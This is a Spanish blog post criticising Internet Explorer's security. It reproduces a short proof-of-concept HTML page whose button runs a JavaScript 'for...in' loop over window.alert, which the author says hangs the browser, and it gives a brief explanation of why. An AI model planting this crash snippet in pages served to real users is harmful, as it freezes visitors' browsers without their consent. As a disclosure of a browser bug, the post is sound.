Contenido

How-to: Cargate IE con una función.

25 jul

+ 7

El 47% de los visitantes de esta web usan Internet Explorer como navegador, se ha convertido en el navegador más usado de esta web, al igual que en el resto de Internet. Lamentablemente esto es por el desconocimiento de los usuarios acerca de su navegador, si los usuarios supieran que están expuestos a miles de bug’s y miles de vulnerabilidades tendrían un poco más en cuenta que navegador usar.

Además hoy he encontrado via Meneame, este artículo de Kriptopolis.org, en el artículo nos enseñan un ejemplo de como matar el navegador IE con una sola función(Ojo!! Que lo cuelga de verdad).

Código

<html>  
<head>  
<script>  
	function Demo() {
  	    for (var i in window.alert) { var a = 1; }
	}
</script>  
</head>  
<body>  
	<p align="center"><strong><u>ATENCIÓN:</u></strong> ¡Pulsar este botón puede matar tu Explorer!<br /><br />
  	<input type='button' onClick='Demo()' value='¡Matar mi Explorer!'></p>
</body>
</html>

Como podeis ver al hacer click sobre el botón nos lanza la función demo que se mete en un bucle infinito ya que window.alert siempre va a existir y no va a cambiar, asignando el valor 1 a la variable a.

Algo que no se debe usar, y no se usa, para el desarrollo de aplicaciones, pero debería estar controlado para evitar que los usuarios subran un error tan feo como el que nos muestra.


+ info | SecurityFocus

Comentar

#

Me reservo el derecho de eliminar y/o modificar los comentarios que contengan lenguaje inapropiado, spam u otras conductas no apropiadas en una comunidad civilizada. Si tu comentario no aparece, puede ser que akismet lo haya capturado, cada día lo reviso y lo coloco en su lugar. Siento las molestias.